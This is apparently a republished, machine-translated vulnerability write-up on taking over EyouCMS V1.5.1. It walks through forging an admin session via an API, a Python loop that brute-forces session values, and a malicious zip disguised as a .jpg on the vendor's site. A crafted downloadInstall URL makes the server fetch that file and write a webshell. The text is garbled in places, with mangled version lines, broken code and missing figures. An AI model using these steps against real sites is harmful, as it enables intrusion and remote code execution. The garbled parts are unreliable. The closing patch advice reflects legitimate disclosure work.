Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to reproduce getshell vulnerabilities in the foreground of EyouCMS V1.5.1. The content of the article is of high quality, so the editor will share it with you for reference. I hope you will have some understanding of the relevant knowledge after reading this article.

Brief introduction of 0x00 vulnerabilities

Praise Internet Technology EyouCMS (Yiyou CMS) is a set of ThinkPHP-based open source content management system (CMS) of Internet Technology companies in China.

There is an arbitrary user background login and file inclusion vulnerability in Eyoucms v1.5.1 and previous versions, which allows an attacker to set an administrator's session in the foreground by calling api, and the background remote plug-in download file contains getshell.

0x01 affects version

EyouCMS = intval (session ('admin_info.role_id')

Admin_info.role_id

(satisfied with less than or equal to 0)

After setting the three session, you can go to the background, as shown in the figure:

Background remote plug-in downloads getshell in application/admin/controller/Weapp.php:1235

Here pass in a $url, and then do a url parsing, which needs to satisfy that the host is eyoucms.com.

That is, the program is limited to downloading plug-ins from the official website, but this check is too simple and can be bypassed.

Then the following is to request the download link, do the decompression, and include the config.php.

The plug-in standard judgment that will be done later is no longer working.

0x04 vulnerability exploitation

Set up an administrator's session at the front desk

First of all, we can first take out the administrator session after successfully logging in and compare it with the session of ordinary users who are not logged in.

Administrator:

Ordinary users:

Call the get_token function to set the session named admin_login_expire

Then check the session of this ordinary user.

Successfully set up.

Similarly, we can add admin_id and admin_info.roke_id.

But this md5 string obviously does not meet the requirements of vulnerability analysis, so here we continue to refresh the session through the script until the appropriate MD5 value is found

While 1: admin_login_expire= api_psot ("admin_login_expire") num_10 = admin_login_expire [2:12] if is_number (num_10): print ("admin_login_expire=", num_10) breakwhile 1: role_id = api_psot ("admin_info.role_id") num_1 = role_id [2:3] if num_1 in ["a", "b", "c" "d", "e", "f"]: print ("role_id=", num_1) breakadmin_id = api_psot ("admin_id") print ("admin_id=", admin_ id [2:-1])

Running result:

Session:

After the conversion of application/admin/controller/Base.php:58 and intval () of:

Successfully use the PHPSESSID to enter the background:

Background remote plug-in download file contains getshell

Then start making malicious compression packages. The file directory structure is as follows:

Weappp\ weapp\ test\ config.phpconfig.php

The content of the file is written to webshell

Compressed to weappp.zip, modified with the suffix jpg

Go to eyoucms.com 's official website to find photo upload points.

For example, the question description of this question module:

Https://www.eyoucms.com/ask/

Get the uploaded image address:

Https://www.eyoucms.com/uploads/allimg/210420/1618908445631562.jpg

Request to download the plug-in directly in the browser:

Http://192.168.58.180/login.php?m=admin&c=weapp&a=downloadInstall&url=https://www.eyoucms.com/uploads/allimg/210420/1618908445631562.jpg

At this point, webshell has been successfully written:

Visit webshell:

0x05 repair recommendation

Upgrade EyouCMS to V1.5.2 or later.

On how to EyouCMS V1.5.1 foreground getshell loopholes to share here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.